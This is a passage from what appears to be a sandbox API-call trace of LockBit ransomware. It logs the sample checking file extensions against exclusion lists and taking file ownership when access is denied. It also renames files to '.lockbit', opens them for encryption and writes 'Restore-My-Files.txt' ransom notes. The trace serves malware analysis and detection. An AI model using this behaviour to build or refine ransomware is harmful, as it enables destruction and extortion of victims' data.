(lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.lockbit")) returned 1 [0077.630] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0077.631] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0077.631] malloc (_Size=0x40068) returned 0x206b860 [0077.631] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=89600) returned 1 [0077.631] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0077.633] GetLastError () returned 0x3e5 [0077.633] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0077.633] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0077.633] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0077.634] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0077.634] malloc (_Size=0x40068) returned 0x20abae0 [0077.634] WriteFile (in: hFile=0x3c0, lpBuffer=0x2064f58*, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x2064f58*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0077.639] GetLastError () returned 0x3e5 [0077.639] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23b3de0, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x23b3de0, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a49fdc1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x7c00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="boxed-delete.avi", cAlternateFileName="")) returned 1 [0077.639] lstrcmpiW (lpString1=".", lpString2="boxed-delete.avi") returned -1 [0077.639] lstrcmpiW (lpString1="..", lpString2="boxed-delete.avi") returned -1 [0077.639] PathFindExtensionW (pszPath="boxed-delete.avi") returned=".avi" [0077.639] lstrcmpiW (lpString1=".386", lpString2=".avi") returned -1 [0077.639] lstrcmpiW (lpString1=".cmd", lpString2=".avi") returned 1 [0077.639] lstrcmpiW (lpString1=".exe", lpString2=".avi") returned 1 [0077.639] lstrcmpiW (lpString1=".ani", lpString2=".avi") returned -1 [0077.639] lstrcmpiW (lpString1=".adv", lpString2=".avi") returned -1 [0077.639] lstrcmpiW (lpString1=".theme", lpString2=".avi") returned 1 [0077.639] lstrcmpiW (lpString1=".msi", lpString2=".avi") returned 1 [0077.639] lstrcmpiW (lpString1=".msp", lpString2=".avi") returned 1 [0077.639] lstrcmpiW (lpString1=".com", lpString2=".avi") returned 1 [0077.639] lstrcmpiW (lpString1=".diagpkg", lpString2=".avi") returned 1 [0077.640] lstrcmpiW (lpString1=".nls", lpString2=".avi") returned 1 [0077.640] lstrcmpiW (lpString1=".diagcab", lpString2=".avi") returned 1 [0077.640] lstrcmpiW (lpString1=".lock", lpString2=".avi") returned 1 [0077.640] lstrcmpiW (lpString1=".ocx", lpString2=".avi") returned 1 [0077.640] lstrcmpiW (lpString1=".mpa", lpString2=".avi") returned 1 [0077.640] lstrcmpiW (lpString1=".cpl", lpString2=".avi") returned 1 [0077.640] lstrcmpiW (lpString1=".mod", lpString2=".avi") returned 1 [0077.640] lstrcmpiW (lpString1=".hta", lpString2=".avi") returned 1 [0077.640] lstrcmpiW (lpString1=".icns", lpString2=".avi") returned 1 [0077.640] lstrcmpiW (lpString1=".prf", lpString2=".avi") returned 1 [0077.640] lstrcmpiW (lpString1=".rtp", lpString2=".avi") returned 1 [0077.640] lstrcmpiW (lpString1=".diagcfg", lpString2=".avi") returned 1 [0077.640] lstrcmpiW (lpString1=".msstyles", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".bin", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".hlp", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".shs", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".drv", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".wpx", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".bat", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".rom", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".msc", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".spl", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".ps1", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".msu", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".ics", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".key", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".mp3", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".reg", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".dll", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".ini", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".idx", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".sys", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".hlp", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".ico", lpString2=".avi") returned 1 [0077.641] lstrcmpiW (lpString1=".lnk", lpString2=".avi") returned 1 [0077.642] lstrcmpiW (lpString1=".rdp", lpString2=".avi") returned 1 [0077.642] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0077.642] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="boxed-delete.avi") returned 1 [0077.642] lstrcmpiW (lpString1="ntldr", lpString2="boxed-delete.avi") returned 1 [0077.642] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="boxed-delete.avi") returned 1 [0077.642] lstrcmpiW (lpString1="bootsect.bak", lpString2="boxed-delete.avi") returned -1 [0077.642] lstrcmpiW (lpString1="autorun.inf", lpString2="boxed-delete.avi") returned -1 [0077.642] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0077.642] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned=".avi" [0077.642] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0077.642] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0077.642] lstrcmpiW (lpString1=".7z", lpString2=".avi") returned -1 [0077.642] lstrcmpiW (lpString1=".ckp", lpString2=".avi") returned 1 [0077.642] lstrcmpiW (lpString1=".dacpac", lpString2=".avi") returned 1 [0077.642] lstrcmpiW (lpString1=".db", lpString2=".avi") returned 1 [0077.642] lstrcmpiW (lpString1=".db-shm", lpString2=".avi") returned 1 [0077.642] lstrcmpiW (lpString1=".db-wal", lpString2=".avi") returned 1 [0077.642] lstrcmpiW (lpString1=".db3", lpString2=".avi") returned 1 [0077.642] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0077.642] lstrcmpiW (lpString1=".dbc", lpString2=".avi") returned 1 [0077.642] lstrcmpiW (lpString1=".dbs", lpString2=".avi") returned 1 [0077.643] lstrcmpiW (lpString1=".dbt", lpString2=".avi") returned 1 [0077.643] lstrcmpiW (lpString1=".dbv", lpString2=".avi") returned 1 [0077.643] lstrcmpiW (lpString1=".frm", lpString2=".avi") returned 1 [0077.643] lstrcmpiW (lpString1=".mdf", lpString2=".avi") returned 1 [0077.643] lstrcmpiW (lpString1=".mrg", lpString2=".avi") returned 1 [0077.643] lstrcmpiW (lpString1=".mwb", lpString2=".avi") returned 1 [0077.643] lstrcmpiW (lpString1=".myd", lpString2=".avi") returned 1 [0077.643] lstrcmpiW (lpString1=".ndf", lpString2=".avi") returned 1 [0077.643] lstrcmpiW (lpString1=".qry", lpString2=".avi") returned 1 [0077.643] lstrcmpiW (lpString1=".sdb", lpString2=".avi") returned 1 [0077.643] lstrcmpiW (lpString1=".sdf", lpString2=".avi") returned 1 [0077.643] lstrcmpiW (lpString1=".sql", lpString2=".avi") returned 1 [0077.643] lstrcmpiW (lpString1=".sqlite", lpString2=".avi") returned 1 [0077.643] lstrcmpiW (lpString1=".sqlite3", lpString2=".avi") returned 1 [0077.643] lstrcmpiW (lpString1=".sqlitedb", lpString2=".avi") returned 1 [0077.643] lstrcmpiW (lpString1=".tmd", lpString2=".avi") returned 1 [0077.643] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.lockbit") returned 82 [0077.643] lstrcmpiW (lpString1=".avi", lpString2=".lockbit") returned -1 [0077.643] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.lockbit")) returned 0 [0077.649] GetLastError () returned 0x5 [0077.650] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0077.650] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0077.650] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.650] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0077.651] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0077.651] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3c0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0077.652] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0077.652] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0077.665] NtClose (Handle=0x3c0) returned 0x0 [0077.665] RtlFreeAnsiString (AnsiString="\\") [0077.665] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3c0) returned 1 [0077.665] malloc (_Size=0x200) returned 0x53fcc0 [0077.665] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0077.665] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.665] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.665] CloseHandle (hObject=0x3c0) returned 1 [0077.665] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0077.666] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0077.666] free (_Block=0x53fcc0) [0077.666] lstrcmpiW (lpString1=".avi", lpString2=".lockbit") returned -1 [0077.666] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.lockbit")) returned 1 [0077.667] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0077.667] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0077.667] malloc (_Size=0x40068) returned 0x20abae0 [0077.667] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x20abaf8 | out: lpFileSize=0x20abaf8*=31744) returned 1 [0077.668] ReadFile (in: hFile=0x3c0, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0077.676] GetLastError () returned 0x3e5 [0077.676] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0077.676] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0077.676] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.676] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23d9f3d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x23d9f3d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a4c5f1f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x8200, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="boxed-join.avi", cAlternateFileName="")) returned 1 [0077.676] lstrcmpiW (lpString1=".", lpString2="boxed-join.avi") returned -1 [0077.676] lstrcmpiW (lpString1="..", lpString2="boxed-join.avi") returned -1 [0077.676] PathFindExtensionW (pszPath="boxed-join.avi") returned=".avi" [0077.676] lstrcmpiW (lpString1=".386", lpString2=".avi") returned -1 [0077.676] lstrcmpiW (lpString1=".cmd", lpString2=".avi") returned 1 [0077.676] lstrcmpiW (lpString1=".exe", lpString2=".avi") returned 1 [0077.677] lstrcmpiW (lpString1=".ani", lpString2=".avi") returned -1 [0077.677] lstrcmpiW (lpString1=".adv", lpString2=".avi") returned -1 [0077.677] lstrcmpiW (lpString1=".theme", lpString2=".avi") returned 1 [0077.677] lstrcmpiW (lpString1=".msi", lpString2=".avi") returned 1 [0077.677] lstrcmpiW (lpString1=".msp", lpString2=".avi") returned 1 [0077.677] lstrcmpiW (lpString1=".com", lpString2=".avi") returned 1 [0077.677] lstrcmpiW (lpString1=".diagpkg", lpString2=".avi") returned 1 [0077.677] lstrcmpiW (lpString1=".nls", lpString2=".avi") returned 1 [0077.677] lstrcmpiW (lpString1=".diagcab", lpString2=".avi") returned 1 [0077.677] lstrcmpiW (lpString1=".lock", lpString2=".avi") returned 1 [0077.677] lstrcmpiW (lpString1=".ocx", lpString2=".avi") returned 1 [0077.677] lstrcmpiW (lpString1=".mpa", lpString2=".avi") returned 1 [0077.677] lstrcmpiW (lpString1=".cpl", lpString2=".avi") returned 1 [0077.677] lstrcmpiW (lpString1=".mod", lpString2=".avi") returned 1 [0077.678] lstrcmpiW (lpString1=".hta", lpString2=".avi") returned 1 [0077.678] lstrcmpiW (lpString1=".icns", lpString2=".avi") returned 1 [0077.678] lstrcmpiW (lpString1=".prf", lpString2=".avi") returned 1 [0077.678] lstrcmpiW (lpString1=".rtp", lpString2=".avi") returned 1 [0077.678] lstrcmpiW (lpString1=".diagcfg", lpString2=".avi") returned 1 [0077.678] lstrcmpiW (lpString1=".msstyles", lpString2=".avi") returned 1 [0077.678] lstrcmpiW (lpString1=".bin", lpString2=".avi") returned 1 [0077.678] lstrcmpiW (lpString1=".hlp", lpString2=".avi") returned 1 [0077.678] lstrcmpiW (lpString1=".shs", lpString2=".avi") returned 1 [0077.678] lstrcmpiW (lpString1=".drv", lpString2=".avi") returned 1 [0077.678] lstrcmpiW (lpString1=".wpx", lpString2=".avi") returned 1 [0077.678] lstrcmpiW (lpString1=".bat", lpString2=".avi") returned 1 [0077.678] lstrcmpiW (lpString1=".rom", lpString2=".avi") returned 1 [0077.678] lstrcmpiW (lpString1=".msc", lpString2=".avi") returned 1 [0077.678] lstrcmpiW (lpString1=".spl", lpString2=".avi") returned 1 [0077.679] lstrcmpiW (lpString1=".ps1", lpString2=".avi") returned 1 [0077.679] lstrcmpiW (lpString1=".msu", lpString2=".avi") returned 1 [0077.679] lstrcmpiW (lpString1=".ics", lpString2=".avi") returned 1 [0077.679] lstrcmpiW (lpString1=".key", lpString2=".avi") returned 1 [0077.679] lstrcmpiW (lpString1=".mp3", lpString2=".avi") returned 1 [0077.679] lstrcmpiW (lpString1=".reg", lpString2=".avi") returned 1 [0077.679] lstrcmpiW (lpString1=".dll", lpString2=".avi") returned 1 [0077.679] lstrcmpiW (lpString1=".ini", lpString2=".avi") returned 1 [0077.679] lstrcmpiW (lpString1=".idx", lpString2=".avi") returned 1 [0077.679] lstrcmpiW (lpString1=".sys", lpString2=".avi") returned 1 [0077.679] lstrcmpiW (lpString1=".hlp", lpString2=".avi") returned 1 [0077.679] lstrcmpiW (lpString1=".ico", lpString2=".avi") returned 1 [0077.679] lstrcmpiW (lpString1=".lnk", lpString2=".avi") returned 1 [0077.679] lstrcmpiW (lpString1=".rdp", lpString2=".avi") returned 1 [0077.679] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0077.680] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="boxed-join.avi") returned 1 [0077.680] lstrcmpiW (lpString1="ntldr", lpString2="boxed-join.avi") returned 1 [0077.680] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="boxed-join.avi") returned 1 [0077.680] lstrcmpiW (lpString1="bootsect.bak", lpString2="boxed-join.avi") returned -1 [0077.680] lstrcmpiW (lpString1="autorun.inf", lpString2="boxed-join.avi") returned -1 [0077.680] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0077.680] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned=".avi" [0077.680] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0077.680] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0077.680] lstrcmpiW (lpString1=".7z", lpString2=".avi") returned -1 [0077.680] lstrcmpiW (lpString1=".ckp", lpString2=".avi") returned 1 [0077.680] lstrcmpiW (lpString1=".dacpac", lpString2=".avi") returned 1 [0077.680] lstrcmpiW (lpString1=".db", lpString2=".avi") returned 1 [0077.680] lstrcmpiW (lpString1=".db-shm", lpString2=".avi") returned 1 [0077.680] lstrcmpiW (lpString1=".db-wal", lpString2=".avi") returned 1 [0077.680] lstrcmpiW (lpString1=".db3", lpString2=".avi") returned 1 [0077.680] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0077.680] lstrcmpiW (lpString1=".dbc", lpString2=".avi") returned 1 [0077.680] lstrcmpiW (lpString1=".dbs", lpString2=".avi") returned 1 [0077.681] lstrcmpiW (lpString1=".dbt", lpString2=".avi") returned 1 [0077.681] lstrcmpiW (lpString1=".dbv", lpString2=".avi") returned 1 [0077.681] lstrcmpiW (lpString1=".frm", lpString2=".avi") returned 1 [0077.681] lstrcmpiW (lpString1=".mdf", lpString2=".avi") returned 1 [0077.681] lstrcmpiW (lpString1=".mrg", lpString2=".avi") returned 1 [0077.681] lstrcmpiW (lpString1=".mwb", lpString2=".avi") returned 1 [0077.681] lstrcmpiW (lpString1=".myd", lpString2=".avi") returned 1 [0077.681] lstrcmpiW (lpString1=".ndf", lpString2=".avi") returned 1 [0077.681] lstrcmpiW (lpString1=".qry", lpString2=".avi") returned 1 [0077.681] lstrcmpiW (lpString1=".sdb", lpString2=".avi") returned 1 [0077.681] lstrcmpiW (lpString1=".sdf", lpString2=".avi") returned 1 [0077.681] lstrcmpiW (lpString1=".sql", lpString2=".avi") returned 1 [0077.681] lstrcmpiW (lpString1=".sqlite", lpString2=".avi") returned 1 [0077.681] lstrcmpiW (lpString1=".sqlite3", lpString2=".avi") returned 1 [0077.681] lstrcmpiW (lpString1=".sqlitedb", lpString2=".avi") returned 1 [0077.681] lstrcmpiW (lpString1=".tmd", lpString2=".avi") returned 1 [0077.681] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.lockbit") returned 80 [0077.681] lstrcmpiW (lpString1=".avi", lpString2=".lockbit") returned -1 [0077.682] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.lockbit")) returned 0 [0077.682] GetLastError () returned 0x5 [0077.682] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0077.683] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0077.683] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.683] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0077.683] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0077.683] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3b0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0077.684] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0077.685] NtQueryInformationFile (in: FileHandle=0x3b0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0077.698] NtClose (Handle=0x3b0) returned 0x0 [0077.698] RtlFreeAnsiString (AnsiString="\\") [0077.699] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3b0) returned 1 [0077.699] malloc (_Size=0x200) returned 0x53fcc0 [0077.699] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0077.699] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.699] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.699] CloseHandle (hObject=0x3b0) returned 1 [0077.699] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0077.699] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0077.700] free (_Block=0x53fcc0) [0077.700] lstrcmpiW (lpString1=".avi", lpString2=".lockbit") returned -1 [0077.700] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.lockbit")) returned 1 [0077.702] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0077.702] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0077.702] malloc (_Size=0x40068) returned 0x206b860 [0077.702] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=33280) returned 1 [0077.702] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, 